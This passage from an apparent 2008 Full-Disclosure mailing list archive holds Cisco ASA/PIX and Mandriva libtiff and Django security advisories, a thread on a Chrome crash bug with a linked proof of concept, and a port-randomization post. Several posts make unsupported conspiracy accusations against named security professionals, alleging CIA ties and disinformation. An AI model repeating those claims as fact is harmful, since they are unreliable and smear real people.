|----------+------------| | requests | | 8.0 | Not | | | | | vulnerable | | | |----------+------------| | | | 8.1 | Not | | | | | vulnerable | |----------------+------------+----------+------------| | | | 7.0 | Not | | | | | vulnerable | | | |----------+------------| | Traceback in | | 7.1 | Not | | Remote Access | | | vulnerable | |Authentication |CSCso69942 |----------+------------| | Code | | 7.2 | 7.2(4)2 | | | |----------+------------| | | | 8.0 | 8.0(3)14 | | | |----------+------------| | | | 8.1 | 8.1(1)4 | |----------------+------------+----------+------------| | | | 7.0 | Not | | | | | vulnerable | | | |----------+------------| | Crypto memory | | 7.1 | Not | | leak causing | | | vulnerable | |Clientless SSL |CSCso66472 |----------+------------| | VPNs to hang | | 7.2 | 7.2(4)2 | | | |----------+------------| | | | 8.0 | 8.0(3)14 | | | |----------+------------| | | | 8.1 | 8.1(1)4 | |----------------+------------+----------+------------| | | | 7.0 | Not | | | | | vulnerable | | | |----------+------------| | HTTP | | 7.1 | Not | | Processing | | | vulnerable | |Error in |CSCsq19369 |----------+------------| | Clientless SSL | | 7.2 | Not | | VPN | | | vulnerable | |connections | |----------+------------| | | | 8.0 | 8.0(3)15 | | | |----------+------------| | | | 8.1 | 8.1(1)5 | |----------------+------------+----------+------------| | | | 7.0 | Not | | | | | vulnerable | | | |----------+------------| | Potential | | 7.1 | Not | | Information | | | vulnerable | |Disclosure in |CSCsq45636 |----------+------------| | Clientless SSL | | 7.2 | Not | | VPNs | | | vulnerable | | | |----------+------------| | | | 8.0 | 8.0(3)16 | | | |----------+------------| | | | 8.1 | 8.1(1)6 | |-----------------------------+----------+------------| | | 7.0 | 7.0(7)16 | | |----------+------------| | | 7.1 | 7.1(2)72 | | |----------+------------| | Recommended Release | 7.2 | 7.2(4)9 | | |----------+------------| | | 8.0 | 8.0(4) | | |----------+------------| | | 8.1 | 8.1(1)8 | +-----------------------------------------------------+ Fixed Cisco PIX software can be downloaded from: http://www.cisco.com/pcgi-bin/tablebuild.pl/pix?psrtdcat20e2 Fixed Cisco ASA software can be downloaded from: http://www.cisco.com/pcgi-bin/tablebuild.pl/asa?psrtdcat20e2 Workarounds =========== The following workarounds may help some customers mitigate these vulnerabilities. Additional mitigation techniques that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory: http://www.cisco.com/warp/public/707/cisco-amb-20080903-asa.shtml Erroneous SIP Processing Vulnerabilities SIP inspection should be disabled if it is not needed and temporarily disabling the feature will mitigate the SIP processing vulnerabilities. SIP inspection can be disabled with the command no inspect sip. IPSec Authentication Processing Vulnerability Use strong group credentials for remote access VPN connections and do not give out the group credentials to end users. SSL VPN Memory Leak Vulnerability and URI Processing Error Vulnerability in SSL VPNs IPSec clients are not vulnerable to this issue and may be used in conjunction with strong group credentials until the device can be upgraded. Potential Information Disclosure in Clientless SSL VPNs Client based VPN connections are not vulnerable to the information disclosure vulnerability. If you are running 8.0(3)15, 8.0(3)16, 8.1(1)4, or 8.1(1)5, you may safely use client based VPN connections as an alternative to clientless VPNs. Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt at cisco.com or security-alert at cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac at cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. These vulnerabilities were reported to Cisco by customers that experienced these issues during normal operation of their equipment and through internal testing efforts. Status of this Notice: FINAL THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080903-asa.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce at cisco.com * first-bulletins at lists.first.org * bugtraq at securityfocus.com * vulnwatch at vulnwatch.org * cisco at spot.colorado.edu * cisco-nsp at puck.nether.net * full-disclosure at lists.grok.org.uk * comp.dcom.sys.cisco at newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2008-Sept-03 | public | | | | release. | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt -----BEGIN PGP SIGNATURE----- iD8DBQFIvsPo86n/Gc8U/uARAmOIAKCcTL2O+3w2mEm0GTe2mcnb0NZ5uQCdG9aV ldazcXFRcGmkm4g38B67ezM= =t2NV -----END PGP SIGNATURE----- From razishaban at gmail.com Wed Sep 3 18:54:29 2008 From: razishaban at gmail.com (Razi Shaban) Date: Wed, 3 Sep 2008 20:54:29 +0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <18911.1220457961@turing-police.cc.vt.edu> References: <20080903.003706.20417.1@webmail08.vgs.untd.com> <5e01c29a0809030052x47f06d72hb6788f8d9fdb42a9@mail.gmail.com> <4b6ee9310809030204y2f01e1bdo301dace11ac08e1f@mail.gmail.com> <18911.1220457961@turing-police.cc.vt.edu> Message-ID: <2d792fb20809031054i14494a32te9186cff5ab4d875@mail.gmail.com> On 9/3/08, Valdis.Kletnieks at vt.edu wrote: ... > I'd place bets that whoever it is, they're on the RBN payroll... ... If they really were the "biggest hacker", why on earth would they work for a large group that would merely dull their shine and take from their profits, etc. No, the "biggest hacker" works alone, because he, or she (zomg!), doesn't really need anyone else. -- Razi From xploitable at gmail.com Wed Sep 3 19:47:22 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Sep 2008 19:47:22 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <18911.1220457961@turing-police.cc.vt.edu> References: <20080903.003706.20417.1@webmail08.vgs.untd.com> <5e01c29a0809030052x47f06d72hb6788f8d9fdb42a9@mail.gmail.com> <4b6ee9310809030204y2f01e1bdo301dace11ac08e1f@mail.gmail.com> <18911.1220457961@turing-police.cc.vt.edu> Message-ID: <4b6ee9310809031147o3211bafdub8202bd5acc2198a@mail.gmail.com> On Wed, Sep 3, 2008 at 5:06 PM, wrote: > I'd place bets that whoever it is, they're on the RBN payroll... > I thought a high ranking security professional like yourself would stick to facts, not the latest disinformation handed out by so-called "trusted" security professionals. Marcus Sachs is good at it, Sans is good at it. We already know the CIA use Sans for it, http://www.securityfocus.com/brief/666. Yet you continue to hang out with them on #dshield on Freenode. You are being led up a garden path by power hungry folks feeding the media news about anything they can orchestrate to ramp up cyber security as a national security agenda item as the next administration is coming in so they can become more powerful in Washington, yet you still trust them. Stop playing into the hands of these guys and have your own opinion about things, unless you two are part of the power hungry cyber security circle of folks who are trying to artificially ramp up and put infront of the media a common cyber enemy, as the next administration is coming in. We will never forget the Youtube video..."How do we put it infront of the media and get their attention?" We can get Valdis to keep repeating an artificial common cyber enemy and have Valdis put random comments on the mailing lists? We all know you hang out with the power hungries because i've idled on #dshield and seen you, and it wouldn't suprise me if you were at that particular speech Marcus Sachs did. No one believes what you say anymore Valdis, you're part of the group who is trying to get the attention of the next administration as they are coming in and 100 days after the next president is in the White House. The Youtube video says it all about what's going on in the world and everything thats wrong with it. Don't be part of the corruption thats going on Valdis, don't be associated with the Marcus Sachs's of the world, you don't want to be that type of person, trust me it will get you into a lot of trouble when it comes to building the evidence of who is guilty for what false flags and who was involved in the ground work and propaganda building on the internet. http://www.youtube.com/watch?v=FSUPTZVlkyU From security at mandriva.com Wed Sep 3 20:14:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Wed, 03 Sep 2008 13:14:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:184 ] libtiff Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:184 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libtiff Date : September 3, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: Drew Yaro of the Apple Product Security Team reported multiple uses of uninitialized values in libtiff's LZW compression algorithm decoder. An attacker could create a carefully crafted LZW-encoded TIFF file that would cause an application linked to libtiff to crash or potentially execute arbitrary code (CVE-2008-2327). The updated packages have been patched to prevent this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2327 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: 5453e1e862c9516bf754ff5dd0510e99 2007.1/i586/libtiff3-3.8.2-8.1mdv2007.1.i586.rpm c41cc4f89c2a576b31f55604020686b9 2007.1/i586/libtiff3-devel-3.8.2-8.1mdv2007.1.i586.rpm 3a84a5b36810fc04266b0e8db40cf95a 2007.1/i586/libtiff3-static-devel-3.8.2-8.1mdv2007.1.i586.rpm 2e184a5e809f31357e1238d4ffb0e7e7 2007.1/i586/libtiff-progs-3.8.2-8.1mdv2007.1.i586.rpm 6f0b7a336c92b3f6026882f16fea8e36 2007.1/SRPMS/libtiff-3.8.2-8.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 712950c98f929999cb7a53dad56db456 2007.1/x86_64/lib64tiff3-3.8.2-8.1mdv2007.1.x86_64.rpm 820be023570529dbcbc4682a687aa59d 2007.1/x86_64/lib64tiff3-devel-3.8.2-8.1mdv2007.1.x86_64.rpm 741e09ecc07a42f95ba97f99daf8b474 2007.1/x86_64/lib64tiff3-static-devel-3.8.2-8.1mdv2007.1.x86_64.rpm 5f44d3ec3d223be06ecdeacae2fc3c04 2007.1/x86_64/libtiff-progs-3.8.2-8.1mdv2007.1.x86_64.rpm 6f0b7a336c92b3f6026882f16fea8e36 2007.1/SRPMS/libtiff-3.8.2-8.1mdv2007.1.src.rpm Mandriva Linux 2008.0: f48e75c73b1485dd999147f6916d714b 2008.0/i586/libtiff3-3.8.2-8.1mdv2008.0.i586.rpm 1f81e09035972f2dd658b740913027f8 2008.0/i586/libtiff3-devel-3.8.2-8.1mdv2008.0.i586.rpm 38cb329a1841478e36a4c2f78c2b9d0f 2008.0/i586/libtiff3-static-devel-3.8.2-8.1mdv2008.0.i586.rpm a69b25380f8eb9dff4cae5731aa1576b 2008.0/i586/libtiff-progs-3.8.2-8.1mdv2008.0.i586.rpm 4062ab04fafcc0b310643bdbcc39e343 2008.0/SRPMS/libtiff-3.8.2-8.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: e06c6562905343841510dc6149321ea7 2008.0/x86_64/lib64tiff3-3.8.2-8.1mdv2008.0.x86_64.rpm 2645a673dd22ff97b87f315e228a6e8a 2008.0/x86_64/lib64tiff3-devel-3.8.2-8.1mdv2008.0.x86_64.rpm 3b35439a9606085a451c85fb87762476 2008.0/x86_64/lib64tiff3-static-devel-3.8.2-8.1mdv2008.0.x86_64.rpm 712fa17a6debde8aaa02b6b63f25e99c 2008.0/x86_64/libtiff-progs-3.8.2-8.1mdv2008.0.x86_64.rpm 4062ab04fafcc0b310643bdbcc39e343 2008.0/SRPMS/libtiff-3.8.2-8.1mdv2008.0.src.rpm Mandriva Linux 2008.1: 96ab6a2cbd02a41d51d28852ba8c542a 2008.1/i586/libtiff3-3.8.2-10.1mdv2008.1.i586.rpm 586ed80dcca4c1512fa0a8f344c4b1ca 2008.1/i586/libtiff3-devel-3.8.2-10.1mdv2008.1.i586.rpm 8536b2918799e028e92946ae5a9f8bfa 2008.1/i586/libtiff3-static-devel-3.8.2-10.1mdv2008.1.i586.rpm 0e311bd531287bd6f71aede0ab233375 2008.1/i586/libtiff-progs-3.8.2-10.1mdv2008.1.i586.rpm 991200fe0e312eb8532e76a42a5f5f36 2008.1/SRPMS/libtiff-3.8.2-10.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 67aba91807aa52b92baefac9f51e5991 2008.1/x86_64/lib64tiff3-3.8.2-10.1mdv2008.1.x86_64.rpm 60bfa4862afb7b8719fa17c7661a422f 2008.1/x86_64/lib64tiff3-devel-3.8.2-10.1mdv2008.1.x86_64.rpm 6e96394972e36c83768433e2b2ad36a7 2008.1/x86_64/lib64tiff3-static-devel-3.8.2-10.1mdv2008.1.x86_64.rpm 0a16cd2b222893004166293534b9edde 2008.1/x86_64/libtiff-progs-3.8.2-10.1mdv2008.1.x86_64.rpm 991200fe0e312eb8532e76a42a5f5f36 2008.1/SRPMS/libtiff-3.8.2-10.1mdv2008.1.src.rpm Corporate 3.0: 518e89f46b971a1bb21ae1c014247924 corporate/3.0/i586/libtiff3-3.5.7-11.14.C30mdk.i586.rpm d60decb8c0b256b22f78aadbe8eebe0c corporate/3.0/i586/libtiff3-devel-3.5.7-11.14.C30mdk.i586.rpm b3f257066e07132549b2d5027736c028 corporate/3.0/i586/libtiff3-static-devel-3.5.7-11.14.C30mdk.i586.rpm 2907ac3739e1718f7908ce64c3fd7867 corporate/3.0/i586/libtiff-progs-3.5.7-11.14.C30mdk.i586.rpm e08892c5ded68d96e16862f8b69946ab corporate/3.0/SRPMS/libtiff-3.5.7-11.14.C30mdk.src.rpm Corporate 3.0/X86_64: bec82cc9258d4500374b06871f420492 corporate/3.0/x86_64/lib64tiff3-3.5.7-11.14.C30mdk.x86_64.rpm 3baa1d2a9aef965ec71ed15ba8bf1a20 corporate/3.0/x86_64/lib64tiff3-devel-3.5.7-11.14.C30mdk.x86_64.rpm 02a22843046e7a3a3208e20ff95f633a corporate/3.0/x86_64/lib64tiff3-static-devel-3.5.7-11.14.C30mdk.x86_64.rpm 529cb32db1c9e2f21278ec3154498278 corporate/3.0/x86_64/libtiff-progs-3.5.7-11.14.C30mdk.x86_64.rpm e08892c5ded68d96e16862f8b69946ab corporate/3.0/SRPMS/libtiff-3.5.7-11.14.C30mdk.src.rpm Corporate 4.0: 700cb8f74636fbb25f2dd2a8d73c3841 corporate/4.0/i586/libtiff3-3.6.1-12.7.20060mlcs4.i586.rpm 305bb87c84edf3261491526a9deef8f9 corporate/4.0/i586/libtiff3-devel-3.6.1-12.7.20060mlcs4.i586.rpm 46bdebacb26f5f05ce572e7de85277e8 corporate/4.0/i586/libtiff3-static-devel-3.6.1-12.7.20060mlcs4.i586.rpm b637cbfec742d8a2c06106cb94c36b5a corporate/4.0/i586/libtiff-progs-3.6.1-12.7.20060mlcs4.i586.rpm bb4663c662718a57113cf78d7e8c7b13 corporate/4.0/SRPMS/libtiff-3.6.1-12.7.20060mlcs4.src.rpm Corporate 4.0/X86_64: e655bb4c3a7b87eb363dcfd24f139dcf corporate/4.0/x86_64/lib64tiff3-3.6.1-12.7.20060mlcs4.x86_64.rpm f9676f4f1400c9311d320a88d67d8b91 corporate/4.0/x86_64/lib64tiff3-devel-3.6.1-12.7.20060mlcs4.x86_64.rpm 5c0dccb5f0168c4e43672d9d7982d49f corporate/4.0/x86_64/lib64tiff3-static-devel-3.6.1-12.7.20060mlcs4.x86_64.rpm 87a216a31e01f158135a23095fd341a1 corporate/4.0/x86_64/libtiff-progs-3.6.1-12.7.20060mlcs4.x86_64.rpm bb4663c662718a57113cf78d7e8c7b13 corporate/4.0/SRPMS/libtiff-3.6.1-12.7.20060mlcs4.src.rpm Multi Network Firewall 2.0: 5acf2c9864c31560ac109574e94caef0 mnf/2.0/i586/libtiff3-3.5.7-11.14.C30mdk.i586.rpm b2f1fc5125dd9e951d6d38ead8050461 mnf/2.0/SRPMS/libtiff-3.5.7-11.14.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIvrMbmqjQ0CJFipgRAqv6AJ9eEBD7LXdc9E8dpYGimLzumWjvUgCgxA3+ gSpOlHU8sZnY2OoFJ9KzkMw= =8p0b -----END PGP SIGNATURE----- From redb0ne at hush.com Wed Sep 3 20:01:55 2008 From: redb0ne at hush.com (redb0ne at hush.com) Date: Wed, 03 Sep 2008 15:01:55 -0400 Subject: [Full-disclosure] Google Chrome Browser Vulnerability Message-ID: <20080903190158.944BF20047@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, 03 Sep 2008 14:47:22 -0400 n3td3v wrote: >On Wed, Sep 3, 2008 at 5:06 PM, wrote: >> I'd place bets that whoever it is, they're on the RBN payroll... >> > >I thought a high ranking security professional like yourself would >stick to facts, not the latest disinformation handed out by so- >called >"trusted" security professionals. Marcus Sachs is good at it, Sans >is >good at it. We already know the CIA use Sans for it, >http://www.securityfocus.com/brief/666. Yet you continue to hang >out >with them on #dshield on Freenode. You are being led up a garden >path >by power hungry folks feeding the media news about anything they >can >orchestrate to ramp up cyber security as a national security >agenda >item as the next administration is coming in so they can become >more >powerful in Washington, yet you still trust them. I'd like to see you provide some proof that this is "disinformation" aside from your delusional theories. There has been plenty of proof that RBN is a real threat, if you are going to try and call people out on spreading misinformation, then you need to be prepared to present a counter argument proving it is disinformation. Otherwise all you are doing is flapping your mouth off. -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 3.0 wpwEAQMCAAYFAki+3yIACgkQGwcl4JwqQeAHagP/aRprRXQYDWWL6tFJ4Ee+QywkG+dZ GV0HdSOUNQGEGdUygvtjIXztlRZuNza0/eSdDwaxDKoM2POCjpcRXoOfikA419S8XrqA L7gFcL5Xn5I/NFO0sIhH/Co4gtlGdxe6nLNzCNc+8BS4rnf77cSJNGINQpkAfwxsYfiY WnZB+yo= =i1Ep -----END PGP SIGNATURE----- From psy.echo at gmail.com Wed Sep 3 20:40:54 2008 From: psy.echo at gmail.com (Rishi Narang) Date: Thu, 4 Sep 2008 01:10:54 +0530 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> Message-ID: <10910496895.20080904011054@gmail.com> Hi, "Time" can definitely plays a major role. There was a collision that occurred due to the fact that I took time to find the real break point in the code, search for a template and to publish at EvilFingers site before sending it to Google and other bugtraqs. Even though I had the vulnerability 4 hrs well before the real publication of the bug and had the exploit along with the some crash details like "int 3" Kernel Exception/Trap @ 0x01002FF3, different attack cases, exceptions of http/ftp and further debug logs; there was this bug published (though without the details of possible cases, exceptions and mouse hover techniques) couple of hours before I released it out at EvilFingers. So, I would like to convey due credit to Mr. JanDeMooij as well for his posting the bug on http://code.google.com/p/chromium/issues/detail?id=122, and thanks to Mr. Brennan for contacting me about the same. -- Thanks & Regards, Rishi Narang | Security Researcher Founder, GREYHAT Insight Key: 0x8D67A3A3 (www.greyhat.in/key.asc) www.greyhat.in ... eschew obfuscation, espouse elucidation. Wednesday, September 3, 2008, 5:43:40 AM, you wrote: > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Rishi > Narang > Sent: Tuesday, September 02, 2008 7:51 PM > To: full-disclosure at lists.grok.org.uk > Subject: [Full-disclosure] Google Chrome Browser Vulnerability > Hi, > --------------------------------------------------- > Software: > Google Chrome Browser 0.2.149.27 > Tested: > Windows XP Professional SP3 > Result: > Google Chrome Crashes with All Tabs > Problem: > An issue exists in how chrome behaves with undefined-handlers in > chrome.dll version 0.2.149.27. A crash can result without user > interaction. When a user is made to visit a malicious link, which has an > undefined handler followed by a 'special' character, the chrome crashes > with a Google Chrome message window "Whoa! Google Chrome has crashed. > Restart now?". It fails in dealing with the POP EBP instruction when > pointed out by the EIP register at 0x01002FF4. > Proof of Concept: > http://evilfingers.com/advisory/google_chrome_poc.php > Credit: > Rishi Narang (psy.echo) > www.greyhat.in > www.evilfingers.com > --------------------------------------------------- From xploitable at gmail.com Wed Sep 3 20:48:31 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Sep 2008 20:48:31 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <20080903190158.944BF20047@smtp.hushmail.com> References: <20080903190158.944BF20047@smtp.hushmail.com> Message-ID: <4b6ee9310809031248y5c6d3412q1c57a81b548e45aa@mail.gmail.com> On Wed, Sep 3, 2008 at 8:01 PM, wrote: > On Wed, 03 Sep 2008 14:47:22 -0400 n3td3v > wrote: >>On Wed, Sep 3, 2008 at 5:06 PM, wrote: >>> I'd place bets that whoever it is, they're on the RBN payroll... >>> >> >>I thought a high ranking security professional like yourself would >>stick to facts, not the latest disinformation handed out by so- >>called >>"trusted" security professionals. Marcus Sachs is good at it, Sans >>is >>good at it. We already know the CIA use Sans for it, >>http://www.securityfocus.com/brief/666. Yet you continue to hang >>out >>with them on #dshield on Freenode. You are being led up a garden >>path >>by power hungry folks feeding the media news about anything they >>can >>orchestrate to ramp up cyber security as a national security >>agenda >>item as the next administration is coming in so they can become >>more >>powerful in Washington, yet you still trust them. > > I'd like to see you provide some proof that this is > "disinformation" aside from your delusional > theories. > > There has been plenty of proof that RBN is a real threat, if you > are going to try and call > people out on spreading misinformation, then you need to be > prepared to present a counter > argument proving it is disinformation. Otherwise all you are doing > is flapping your mouth off. > The biggest hackers of the world are not in the RBN... this is disinformation. He just made it up because it helps to sex things up to influence the next administration as it is coming in. From security at mandriva.com Wed Sep 3 21:51:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Wed, 03 Sep 2008 14:51:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:185 ] python-django Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:185 http://www.mandriva.com/security/ _______________________________________________________________________ Package : python-django Date : September 3, 2008 Affected: 2007.1, 2008.0, 2008.1 _______________________________________________________________________ Problem Description: A cross-site request forgery vulnerability was discovered in Django that, if exploited, could be used to perform unrequested deletion or modification of data. Updated versions of Django will now discard posts from users whose sessions have expired, so data will need to be re-entered in these cases. The versions of Django shipping with Mandriva Linux have been updated to the latest patched versions that include the fix for this issue. In addition, they provide other bug fixes. _______________________________________________________________________ References: http://www.djangoproject.com/weblog/2008/sep/02/security/ _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: 38edd5a0e5521c3c1acfd19e51875ea9 2007.1/i586/python-django-0.95.4-0.1mdv2007.1.noarch.rpm 0380a1637f0796008dcd5c29a9c78182 2007.1/SRPMS/python-django-0.95.4-0.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 5b96616e028855ff7e5afa8f5c583c01 2007.1/x86_64/python-django-0.95.4-0.1mdv2007.1.noarch.rpm 0380a1637f0796008dcd5c29a9c78182 2007.1/SRPMS/python-django-0.95.4-0.1mdv2007.1.src.rpm Mandriva Linux 2008.0: b44c60bcbdfd6ae99460fabd6de4cffd 2008.0/i586/python-django-0.96.3-0.1mdv2008.0.noarch.rpm ab14397d32e097129323453dc3fea45f 2008.0/SRPMS/python-django-0.96.3-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 0edf0f10f8f23c326e97136ee2f53771 2008.0/x86_64/python-django-0.96.3-0.1mdv2008.0.noarch.rpm ab14397d32e097129323453dc3fea45f 2008.0/SRPMS/python-django-0.96.3-0.1mdv2008.0.src.rpm Mandriva Linux 2008.1: 30efe5a9d7c66921dac5f7240b803728 2008.1/i586/python-django-0.96.3-0.1mdv2008.1.noarch.rpm 9f7363e6176cf979043fc514bde04697 2008.1/SRPMS/python-django-0.96.3-0.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 7387677bee02518fa5ef9086b4bbf48b 2008.1/x86_64/python-django-0.96.3-0.1mdv2008.1.noarch.rpm 9f7363e6176cf979043fc514bde04697 2008.1/SRPMS/python-django-0.96.3-0.1mdv2008.1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIvss9mqjQ0CJFipgRApXgAJ9E6UrB1O4xV2D86+2RlZhS1mhcVACgtbR3 HR8hGgsIZiYSS0cMszhWCx8= =zGMS -----END PGP SIGNATURE----- From redb0ne at hush.com Wed Sep 3 21:39:45 2008 From: redb0ne at hush.com (redb0ne at hush.com) Date: Wed, 03 Sep 2008 16:39:45 -0400 Subject: [Full-disclosure] Google Chrome Browser Vulnerability Message-ID: <20080903203947.5E15C11803C@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >Even though I had the vulnerability 4 hrs well before the real >publication of the bug and had the exploit along with the some >crash details like "int 3" Kernel Exception/Trap @ 0x01002FF3, >different attack cases, exceptions of http/ftp and further debug >logs; there was this bug published (though without the details of >possible cases, exceptions and mouse hover techniques) couple of >hours before I released it out at EvilFingers. This is an out of bounds memory read that crashes the browser. It is a major exaggeration to call this a vulnerability, especially considering this is a beta browser. Not that others haven't already said it, but people never seem to learn that a browser crash is a stability issue, not a security issue. -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 3.0 wpwEAQMCAAYFAki+9g8ACgkQGwcl4JwqQeBgBgP/YGeDE2VtxDaxw4S81LadJc0GbCJo BmkN5g+6VhimPxUwvLgGyYoyaJg+Ab/cPzDELLMfp6h9jV+14jLO+2NYMnM8/G236Xjd sew1u81YXnKUjaDkX0clUT9K9sWkQ2kJwnH6ZbMncnSpTXBLISiXyhoDCvtrdeTI1y8t 9a2kAMc= =ysci -----END PGP SIGNATURE----- From jerome.benoit at grenouille.com Wed Sep 3 23:39:20 2008 From: jerome.benoit at grenouille.com (Jerome Benoit) Date: Thu, 4 Sep 2008 00:39:20 +0200 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> Message-ID: <20080904003920.d64a5495.jerome.benoit@grenouille.com> Le Mon, 01 Sep 2008 02:44:35 -0300, Fernando Gont a os?(e) ?crire : > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA256 > > Folks, > > We have published a revision of our IETF Internet-Draft about port > randomization. It is available at: > http://www.gont.com.ar/drafts/port-randomization/draft-ietf-tsvwg-port-rand > omization-02.txt (you can find the document in other fancy formats at: > http://www.gont.com.ar/drafts/port-randomization/index.html) > Hi, I'm still wondering how much overhead algorithm #3 and #4 add ... Did someone have done some tests ? Cheers. -- J?r?me Benoit aka fraggle La 